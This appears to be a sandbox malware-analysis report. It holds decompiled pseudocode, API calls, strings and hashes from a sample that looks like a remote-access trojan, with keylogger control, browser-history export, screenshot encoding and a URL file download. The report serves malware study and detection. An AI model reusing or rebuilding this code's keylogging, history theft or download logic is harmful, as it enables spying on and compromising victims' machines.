                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alloca_probe_16__freea
                    • String ID: X2}
                    • API String ID: 1635606685-1579876330
                    • Opcode ID: 0eec5f9a9c2c35fe5a313b59af56dd5369e0d4d5fe05051889c97add7857e5e6
                    • Instruction ID: 6f967e1c2338509da40a8f1eff8a4612066effe81077e4d9f69f9fe7278bcf95
                    • Opcode Fuzzy Hash: 0eec5f9a9c2c35fe5a313b59af56dd5369e0d4d5fe05051889c97add7857e5e6
                    • Instruction Fuzzy Hash: C341E632E10611ABEF21AF65DC41B5FB7A4AF46724F14052BF804DB252EB78DC44879A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E0040404C(void* __ebx) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				char _v172;
                    				short _v692;
                    				void* __edi;
                    				void* __ebp;
                    				struct HINSTANCE__* _t81;
                    				struct HINSTANCE__* _t84;
                    				void* _t85;
                    				void* _t86;
                    
                    				_t48 = __ebx;
                    				_t81 = 0;
                    				GetModuleFileNameW(0,  &_v692, 0x104);
                    				E004020DF(__ebx,  &_v52);
                    				E0040D7F1( &_v28, 0x30, E00401FAB(E0041B40D( &_v76)));
                    				E00401FD8();
                    				E00401FAB(0x473e18);
                    				E00417FFD(E00401F04(E00403014(_t48,  &_v100, E0040431D(_t48,  &_v124, E004042FC(_t48,  &_v148,  &_v692, _t85, 0, E0040417E(__ebx,  &_v172, 0x30, _t85, L" /sort \"Visit Time\" /stext \"")), _t85, 0,  &_v28), 0, _t85, 0, "\"")));
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				_t84 = 0;
                    				while(1) {
                    					E00401F04( &_v28);
                    					_t80 =  &_v52;
                    					if(E0041BF1A( &_v52) != 0) {
                    						break;
                    					}
                    					Sleep(0xfa);
                    					_t84 =  &(_t84->i);
                    					if(_t84 < 0x14) {
                    						continue;
                    					} else {
                    					}
                    					L5:
                    					E00401F09();
                    					E00401FD8();
                    					return _t81;
                    				}
                    				E004020F6(_t48, _t86 - 0x18,  &_v52, __eflags,  &_v52);
                    				_push(0x9d);
                    				E00404AA1(0x473d98, _t80, __eflags);
                    				_t81 = 1;
                    				__eflags = 1;
                    				goto L5;
                    			}

















                    0x0040404c
                    0x00404063
                    0x00404066
                    0x0040406f
                    0x00404089
                    0x00404092
                    0x0040409c
                    0x004040f0
                    0x004040f8
                    0x00404100
                    0x0040410b
                    0x00404116
                    0x0040411b
                    0x0040411d
                    0x00404120
                    0x00404125
                    0x00404131
                    0x00000000
                    0x00000000
                    0x00404138
                    0x0040413e
                    0x00404142
                    0x00000000
                    0x00000000
                    0x00404144
                    0x00404166
                    0x00404169
                    0x00404171
                    0x0040417d
                    0x0040417d
                    0x0040414f
                    0x00404154
                    0x0040415e
                    0x00404165
                    0x00404165
                    0x00000000

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                      • Part of subcall function 0041B40D: GetCurrentProcessId.KERNEL32(00000000,76B7FBB0,00000000,?,?,?,?,0046B928,0040D016,.vbs,?,?,?,?,?,004742D8), ref: 0041B434
                      • Part of subcall function 00417FFD: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00464E64), ref: 00418013
                      • Part of subcall function 00417FFD: CloseHandle.KERNEL32(dNF,?,?,004040F5,00464E64), ref: 0041801C
                      • Part of subcall function 0041BF1A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A6B8), ref: 0041BF33
                    • Sleep.KERNEL32(000000FA,00464E64), ref: 00404138
                    Strings
                    • /sort "Visit Time" /stext ", xrefs: 004040B2
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                    • String ID: /sort "Visit Time" /stext "
                    • API String ID: 368326130-1573945896
                    • Opcode ID: 62a55037aa35f1c594784dfa979a410d243bd05b2733236b1cb3c276efd83ca0
                    • Instruction ID: 4f4d9e235959be1209f5e7ce6ecb2423d96ff0cf2a58feb47d13ba3655636d8d
                    • Opcode Fuzzy Hash: 62a55037aa35f1c594784dfa979a410d243bd05b2733236b1cb3c276efd83ca0
                    • Instruction Fuzzy Hash: 9F316371A0021956CB14FBA6DC569ED7775AF90308F40007FF606B71E2EF385D8ACA99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E00418527(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
                    				char _v104;
                    				char _v108;
                    				char _v112;
                    				intOrPtr _v116;
                    				void* _v132;
                    				intOrPtr _v136;
                    				intOrPtr _v140;
                    				char _v144;
                    				signed int _v148;
                    				char _v160;
                    				char _v164;
                    				intOrPtr _v196;
                    				intOrPtr _v200;
                    				char _v236;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr* _t29;
                    				intOrPtr* _t52;
                    				intOrPtr* _t66;
                    				void* _t71;
                    
                    				_t71 = __ecx;
                    				_v148 =  *_a4 & 0x000000ff;
                    				_t29 =  *0x473ad8(E00401FAB(__edx), E0040247C());
                    				_t52 = _t29;
                    				E004180EB( &_v144, _t52);
                    				E00418D23(L"image/jpeg",  &_v104);
                    				_v136 = 1;
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				_v116 = 1;
                    				_v112 = 4;
                    				_v108 =  &_v164;
                    				_t66 =  *0x473ad8(0, 0, __edx);
                    				E00418160( &_v112,  &_v160, _t66,  &_v112,  &_v144);
                    				 *((intOrPtr*)( *_t66 + 0x30))(_t66,  &_v108, 1);
                    				E0040520C(_t52, _t71,  &_v104, _t66, _t71, _v112, 0);
                    				asm("xorps xmm0, xmm0");
                    				asm("movlpd [esp+0x20], xmm0");
                    				 *((intOrPtr*)( *_t66 + 0x14))(_t66, _v200, _v196, 0, 0);
                    				 *((intOrPtr*)( *_t66 + 0xc))(_t66, E00401FAB(_t71), _v140, 0);
                    				 *((intOrPtr*)( *_t52 + 8))(_t52);
                    				E0041810E( *((intOrPtr*)( *_t66 + 8))(_t66),  &_v236);
                    				return _t71;
                    			}
























                    0x0041853c
                    0x0041853e
                    0x00418553
                    0x0041855a
                    0x00418561
                    0x0041856f
                    0x00418580
                    0x00418584
                    0x00418585
                    0x00418586
                    0x00418587
                    0x0041858a
                    0x00418593
                    0x0041859c
                    0x004185a6
                    0x004185b7
                    0x004185c6
                    0x004185d0
                    0x004185d7
                    0x004185dc
                    0x004185eb
                    0x004185ff
                    0x00418605
                    0x00418612
                    0x00418623

                    APIs
                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418553
                      • Part of subcall function 004180EB: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418566,00000000,?,?,?,?,00000000), ref: 004180FF
                    • SHCreateMemStream.SHLWAPI(00000000), ref: 004185A0
                      • Part of subcall function 00418160: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,004185BC,00000000,?,?), ref: 00418172
                      • Part of subcall function 0041810E: GdipDisposeImage.GDIPLUS(?,00418617), ref: 00418117
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                    • String ID: image/jpeg
                    • API String ID: 1291196975-3785015651
                    • Opcode ID: 1e07b58fd818a9997a367eb3961eb0ee3962e1efbad70472af21d5fa1c881bd2
                    • Instruction ID: 46b6cf18cbf9869d0425c385804350360af8c377447810cb19922dd34496479f
                    • Opcode Fuzzy Hash: 1e07b58fd818a9997a367eb3961eb0ee3962e1efbad70472af21d5fa1c881bd2
                    • Instruction Fuzzy Hash: D1315E72604314AFC301EF65C844DAFB7EDEF8A704F00492EF985A7251DB7999448BA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00451547(void* __ecx, signed int _a4, intOrPtr _a8) {
                    				int _v8;
                    				void* __esi;
                    				int _t15;
                    				int _t16;
                    				signed int _t17;
                    				signed int _t23;
                    				signed int _t25;
                    				signed int _t26;
                    				signed int _t27;
                    				void* _t30;
                    				void* _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr* _t34;
                    				intOrPtr* _t36;
                    
                    				_push(__ecx);
                    				_t23 = _a4;
                    				_push(_t34);
                    				if(_t23 == 0) {
                    					L21:
                    					_t15 = E004482FC(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
                    					__eflags = _t15;
                    					if(_t15 != 0) {
                    						_t16 = _v8;
                    						__eflags = _t16;
                    						if(_t16 == 0) {
                    							_t16 = GetACP();
                    						}
                    						L25:
                    						return _t16;
                    					}
                    					L22:
                    					_t16 = 0;
                    					goto L25;
                    				}
                    				_t17 = 0;
                    				if( *_t23 == 0) {
                    					goto L21;
                    				}
                    				_t34 = 0x45f338;
                    				_t25 = _t23;
                    				while(1) {
                    					_t30 =  *_t25;
                    					if(_t30 !=  *_t34) {
                    						break;
                    					}
                    					if(_t30 == 0) {
                    						L7:
                    						_t26 = _t17;
                    						L9:
                    						if(_t26 == 0) {
                    							goto L21;
                    						}
                    						_t36 = 0x45f340;
                    						_t27 = _t23;
                    						while(1) {
                    							_t31 =  *_t27;
                    							if(_t31 !=  *_t36) {
                    								break;
                    							}
                    							if(_t31 == 0) {
                    								L17:
                    								_t48 = _t17;
                    								if(_t17 != 0) {
                    									_t16 = E0043B477(_t23, _t23);
                    									goto L25;
                    								}
                    								if(E004482FC(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
                    									goto L22;
                    								}
                    								_t16 = _v8;
                    								goto L25;
                    							}
                    							_t32 =  *((intOrPtr*)(_t27 + 2));
                    							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
                    								break;
                    							}
                    							_t27 = _t27 + 4;
                    							_t36 = _t36 + 4;
                    							if(_t32 != 0) {
                    								continue;
                    							}
                    							goto L17;
                    						}
                    						asm("sbb eax, eax");
                    						_t17 = _t17 | 0x00000001;
                    						__eflags = _t17;
                    						goto L17;
                    					}
                    					_t33 =  *((intOrPtr*)(_t25 + 2));
                    					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
                    						break;
                    					}
                    					_t25 = _t25 + 4;
                    					_t34 = _t34 + 4;
                    					if(_t33 != 0) {
                    						continue;
                    					}
                    					goto L7;
                    				}
                    				asm("sbb edx, edx");
                    				_t26 = _t25 | 0x00000001;
                    				__eflags = _t26;
                    				goto L9;
                    			}


















                    0x0045154c
                    0x0045154d
                    0x00451550
                    0x00451554
                    0x004515fa
                    0x0045160e
                    0x00451613
                    0x00451615
                    0x0045161b
                    0x0045161e
                    0x00451620
                    0x00451622
                    0x00451622
                    0x00451628
                    0x0045162d
                    0x0045162d
                    0x00451617
                    0x00451617
                    0x00000000
                    0x00451617
                    0x0045155a
                    0x0045155f
                    0x00000000
                    0x00000000
                    0x00451565
                    0x0045156a
                    0x0045156c
                    0x0045156c
                    0x00451572
                    0x00000000
                    0x00000000
                    0x00451577
                    0x0045158e
                    0x0045158e
                    0x00451597
                    0x00451599
                    0x00000000
                    0x00000000
                    0x0045159b
                    0x004515a0
                    0x004515a2
                    0x004515a2
                    0x004515a8
                    0x00000000
                    0x00000000
                    0x004515ad
                    0x004515cb
                    0x004515cb
                    0x004515cd
                    0x004515f2
                    0x00000000
                    0x004515f7
                    0x004515ea
                    0x00000000
                    0x00000000
                    0x004515ec
                    0x00000000
                    0x004515ec
                    0x004515af
                    0x004515b7
                    0x00000000
                    0x00000000
                    0x004515b9
                    0x004515bc
                    0x004515c2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004515c4
                    0x004515c6
                    0x004515c8
                    0x004515c8
                    0x00000000
                    0x004515c8
                    0x00451579
                    0x00451581
                    0x00000000
                    0x00000000
                    0x00451583
                    0x00451586
                    0x0045158c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0045158c
                    0x00451592
                    0x00451594
                    0x00451594
                    0x00000000

                    APIs
                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,004517A2,?,00000050,?,?,?,?,?), ref: 00451622
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ACP$OCP
                    • API String ID: 0-711371036
                    • Opcode ID: c61663b96a8ec021b9842a66809bbff8a43d0e205551c41e836356951084280c
                    • Instruction ID: 830fbc2f9cb4b93eeeb859f4fbc7073fb1f8b7ed31a82c13c7e8bfaab94b608f
                    • Opcode Fuzzy Hash: c61663b96a8ec021b9842a66809bbff8a43d0e205551c41e836356951084280c
                    • Instruction Fuzzy Hash: F0212462A00108B7E7208A648901BAB73EAEB94B57F568426ED07D7313F73ADD49C35D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E00418624(void* __ecx, void* __edx, void* __eflags) {
                    				char _v108;
                    				char _v112;
                    				char _v116;
                    				char _v132;
                    				intOrPtr _v144;
                    				intOrPtr _v168;
                    				intOrPtr _v172;
                    				char _v208;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr* _t18;
                    				intOrPtr* _t37;
                    				intOrPtr* _t50;
                    				void* _t54;
                    
                    				_t54 = __ecx;
                    				_t18 =  *0x473ad8(E00401FAB(__edx), E0040247C());
                    				_t37 = _t18;
                    				E004180EB( &_v116, _t37);
                    				E00418D23(L"image/png",  &_v108);
                    				_t50 =  *0x473ad8(0, 0, __edx);
                    				E00418160( &_v116,  &_v132, _t50,  &_v116, 0);
                    				 *((intOrPtr*)( *_t50 + 0x30))(_t50,  &_v112, 1);
                    				E0040520C(_t37, _t54,  &_v108, _t50, _t54, _v116, 0);
                    				asm("xorps xmm0, xmm0");
                    				asm("movlpd [esp+0x18], xmm0");
                    				 *((intOrPtr*)( *_t50 + 0x14))(_t50, _v172, _v168, 0, 0);
                    				 *((intOrPtr*)( *_t50 + 0xc))(_t50, E00401FAB(_t54), _v144, 0);
                    				 *((intOrPtr*)( *_t37 + 8))(_t37);
                    				E0041810E( *((intOrPtr*)( *_t50 + 8))(_t50),  &_v208);
                    				return _t54;
                    			}


















                    0x0041862c
                    0x0041863f
                    0x00418646
                    0x0041864d
                    0x0041865b
                    0x0041866a
                    0x00418677
                    0x00418686
                    0x00418690
                    0x00418697
                    0x0041869c
                    0x004186ab
                    0x004186bf
                    0x004186c5
                    0x004186d2
                    0x004186e0

                    APIs
                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 0041863F
                      • Part of subcall function 004180EB: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418566,00000000,?,?,?,?,00000000), ref: 004180FF
                    • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418664
                      • Part of subcall function 00418160: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,004185BC,00000000,?,?), ref: 00418172
                      • Part of subcall function 0041810E: GdipDisposeImage.GDIPLUS(?,00418617), ref: 00418117
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                    • String ID: image/png
                    • API String ID: 1291196975-2966254431
                    • Opcode ID: e72f2a0335f93b42e6adbb58eca2337c6e356beff51710a6ed36422efb5116c3
                    • Instruction ID: 53adb7443a4f289a16b18270b42bc77e55460ec2883d8866c72118b220dd4c10
                    • Opcode Fuzzy Hash: e72f2a0335f93b42e6adbb58eca2337c6e356beff51710a6ed36422efb5116c3
                    • Instruction Fuzzy Hash: 9121C372200215AFC701EF61CC89CAFBBBCEF8A714F10052EF54693161DF3899458BA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00404FF4(intOrPtr _a4) {
                    				char _v24;
                    				void* _v28;
                    				struct _SYSTEMTIME _v40;
                    				void* __ebx;
                    				void* __ebp;
                    				void* _t11;
                    				void* _t17;
                    				void* _t35;
                    				intOrPtr _t36;
                    				void* _t38;
                    				void* _t42;
                    				void* _t43;
                    				void* _t47;
                    
                    				if( *0x4745dc == 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				_t36 = _a4;
                    				if( *0x471d48 == 0) {
                    					L7:
                    					 *0x4745f8 =  *0x4745f8 & 0x00000000;
                    					 *0x4745fd = 1;
                    					 *0x4745f4 = _t36;
                    					return 1;
                    				}
                    				_t46 =  *0x4745fc;
                    				_t22 = "KeepAlive             | Enabled | Timeout: ";
                    				_t37 = "i";
                    				if( *0x4745fc != 0) {
                    					GetLocalTime( &_v40);
                    					_t17 = E0041B623("KeepAlive             | Enabled | Timeout: ",  &_v24, _t36);
                    					_t42 = _t38 - 0x18;
                    					E004052FD(_t22, _t42, _t22, "i", _t46, _t17);
                    					_t43 = _t42 - 0x14;
                    					E00402093(_t22, _t43, _t22, "i", _t37);
                    					E0041AF84(_t22, _t35);
                    					_t38 = _t43 + 0x30;
                    					E00401FD8();
                    					 *0x4745fc = 0;
                    				}
                    				_t47 =  *0x4745f4 - _t36; // 0x3c
                    				if(_t47 != 0) {
                    					_t48 =  *0x4745fd;
                    					if( *0x4745fd != 0) {
                    						GetLocalTime( &_v40);
                    						_t11 = E0041B623(_t22,  &_v24, _t36);
                    						_t39 = _t38 - 0x18;
                    						E004052FD(_t22, _t38 - 0x18, _t22, _t37, _t48, _t11);
                    						E00402093(_t22, _t39 - 0x14, _t22, _t37, _t37);
                    						E0041AF84(_t22, _t35);
                    						E00401FD8();
                    					}
                    				}
                    				goto L7;
                    			}
















                    0x00405001
                    0x004050d9
                    0x00000000
                    0x004050d9
                    0x0040500e
                    0x00405012
                    0x004050c1
                    0x004050c1
                    0x004050ca
                    0x004050d1
                    0x00000000
                    0x004050d1
                    0x00405018
                    0x0040501f
                    0x00405024
                    0x00405029
                    0x00405030
                    0x0040503c
                    0x00405041
                    0x00405049
                    0x0040504e
                    0x00405054
                    0x00405059
                    0x0040505e
                    0x00405065
                    0x0040506a
                    0x0040506a
                    0x00405071
                    0x00405077
                    0x00405079
                    0x00405080
                    0x00405087
                    0x00405093
                    0x00405098
                    0x004050a0
                    0x004050ab
                    0x004050b0
                    0x004050bc
                    0x004050bc
                    0x00405080
                    0x00000000

                    APIs
                    • GetLocalTime.KERNEL32(?,00474580,?,00000000,?,?,?,?,?,?,004158D9,?,00000001,0000004C,00000000), ref: 00405030
                      • Part of subcall function 0041AF84: GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                    • GetLocalTime.KERNEL32(?,00474580,?,00000000,?,?,?,?,?,?,004158D9,?,00000001,0000004C,00000000), ref: 00405087
                    Strings
                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: KeepAlive | Enabled | Timeout:
                    • API String ID: 481472006-1507639952
                    • Opcode ID: a6268718b021a56a190aa7d0231ba750b513022d05331a3a3d503060b31ebc67
                    • Instruction ID: e42f64f53a75ee4bedc2642b0d184ca2840898e041f58df3634ba44158598f18
                    • Opcode Fuzzy Hash: a6268718b021a56a190aa7d0231ba750b513022d05331a3a3d503060b31ebc67
                    • Instruction Fuzzy Hash: 1A21CF719042802BD704B7269C46B7F7B64AB91308F44047EE955272E2DB3D5589CFEB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E00416250() {
                    				signed char _t4;
                    				void* _t5;
                    				void* _t6;
                    				void* _t7;
                    
                    				asm("clc");
                    				 *_t4 =  *_t4 | _t4;
                    				 *((intOrPtr*)(_t6 + 0x64)) =  *((intOrPtr*)(_t6 + 0x64)) + _t5;
                    				E0040CE9F();
                    				asm("arpl di, di");
                    				goto ( *((intOrPtr*)(_t7 - 0xffffffffffffff91)));
                    			}







                    0x00416250
                    0x00416251
                    0x00416253
                    0x00416b4c
                    0x00416b4e
                    0x00416b50

                    APIs
                    • Sleep.KERNEL32 ref: 00416256
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004162B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: DownloadFileSleep
                    • String ID: !D@
                    • API String ID: 1931167962-604454484
                    • Opcode ID: 6710b028bc13d1326dd49b39558d7c1741273632aaee3169053d9891c5616022
                    • Instruction ID: 88c326cd1c9d3a1fefd7b6b3644ea16748e2263b01e7680ba5841856a0bd7db1
                    • Opcode Fuzzy Hash: 6710b028bc13d1326dd49b39558d7c1741273632aaee3169053d9891c5616022
                    • Instruction Fuzzy Hash: F81181716083025AC714FB72D8A69AE73A9AF50348F400C7FF446A21E2EE7C9948C65A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E004349BB(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {
                    
                    				asm("repne jnz 0x5");
                    				asm("repne ret");
                    				asm("repne jmp 0x2e");
                    				SetUnhandledExceptionFilter(0);
                    				UnhandledExceptionFilter(_a4);
                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                    			}



                    0x004349c1
                    0x004349c4
                    0x004349c6
                    0x004349d1
                    0x004349da
                    0x004349f3

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004349FF
                    • ___raise_securityfailure.LIBCMT ref: 00434AE6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: 8G
                    • API String ID: 3761405300-2284832580
                    • Opcode ID: f58dfd9236048841e7c6ab4afb2841bace9ed7037ea0c3851e74af0a8fcbaee5
                    • Instruction ID: 9364091d8682dc77e0a1ada179ca1df83fa4bac5101afd44b2e38c3fbbc97a96
                    • Opcode Fuzzy Hash: f58dfd9236048841e7c6ab4afb2841bace9ed7037ea0c3851e74af0a8fcbaee5
                    • Instruction Fuzzy Hash: F921BEB5502304DBD760DF55FA85B557BA4AB48324F10683AE90C8B3A1E7F569C0CB8D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E0041AF84(void* __ebx, void* __edi, char _a4, char _a28) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				signed short _v102;
                    				signed short _v104;
                    				signed short _v106;
                    				signed short _v108;
                    				void* __ebp;
                    				void* _t57;
                    				signed int _t58;
                    				struct _SYSTEMTIME* _t60;
                    
                    				_t60 = (_t58 & 0xfffffff8) - 0x70;
                    				_t62 =  *0x471d48;
                    				if( *0x471d48 != 0) {
                    					GetLocalTime(_t60);
                    					_push(_v102 & 0x0000ffff);
                    					_push(_v104 & 0x0000ffff);
                    					_push(_v106 & 0x0000ffff);
                    					E00407127(_t62, E00401FAB(E00406383(__ebx,  &_v100, E00402F10(__ebx,  &_v76, E00406383(__ebx,  &_v52, E0040531E( &_v28, "%02i:%02i:%02i:%03i ", _t57,  &_a4), __edi, _t57, _t62, " | "), _t57, _t62,  &_a28), __edi, _t57, _t62, "\n")), _v108 & 0x0000ffff);
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    				}
                    				E00401FD8();
                    				return E00401FD8();
                    			}















                    0x0041af8a
                    0x0041af8d
                    0x0041af94
                    0x0041af9e
                    0x0041afad
                    0x0041afb8
                    0x0041afbe
                    0x0041b009
                    0x0041b015
                    0x0041b01e
                    0x0041b027
                    0x0041b030
                    0x0041b030
                    0x0041b038
                    0x0041b048

                    APIs
                    • GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: | $%02i:%02i:%02i:%03i
                    • API String ID: 481472006-2430845779
                    • Opcode ID: d8bd8214f9ec776e0c0e43669974b742fdca4cd59d9cf52ca9834ec7e68517b4
                    • Instruction ID: 74f699016d75bc07a33d7be6cd1a86528f3c151e219f9548d3f5cb76e4d019cb
                    • Opcode Fuzzy Hash: d8bd8214f9ec776e0c0e43669974b742fdca4cd59d9cf52ca9834ec7e68517b4
                    • Instruction Fuzzy Hash: D31181714082055AC304FB66D8418BFB7E9AB44348F50093FF895A21E1FF3CDA45C79A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E0040AEC6(void* __ebx, struct HHOOK__** __ecx, void* __edx) {
                    				char _v28;
                    				void* __edi;
                    				void* __ebp;
                    				struct HHOOK__** _t30;
                    				void* _t31;
                    				void* _t32;
                    
                    				_t30 = __ecx;
                    				_t37 =  *((char*)(__ecx + 0x4a));
                    				if( *((char*)(__ecx + 0x4a)) == 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				E00402093(__ebx,  &_v28, __edx, _t31, "Online Keylogger Stopped");
                    				E0041B6F3(_t32 - 0x18,  &_v28);
                    				E0040AFD9(__ebx, _t30, _t37);
                    				E00401FD8();
                    				E00402093(__ebx, _t32,  &_v28, _t31, "Online Keylogger Stopped");
                    				E00402093(__ebx, _t32 - 0xffffffffffffffe8,  &_v28, _t31, "i");
                    				E0041AF84(__ebx, "Online Keylogger Stopped");
                    				_t30[0x12] = 0;
                    				CloseHandle(_t30[0xf]);
                    				if(_t30[0x12] == 0 &&  *_t30 != 0) {
                    					UnhookWindowsHookEx( *_t30);
                    					 *_t30 =  *_t30 & 0x00000000;
                    				}
                    				return 1;
                    			}









                    0x0040aecd
                    0x0040aed0
                    0x0040aed4
                    0x0040af49
                    0x00000000
                    0x0040af49
                    0x0040aedf
                    0x0040aeec
                    0x0040aef3
                    0x0040aefb
                    0x0040af06
                    0x0040af15
                    0x0040af1a
                    0x0040af22
                    0x0040af29
                    0x0040af33
                    0x0040af3c
                    0x0040af42
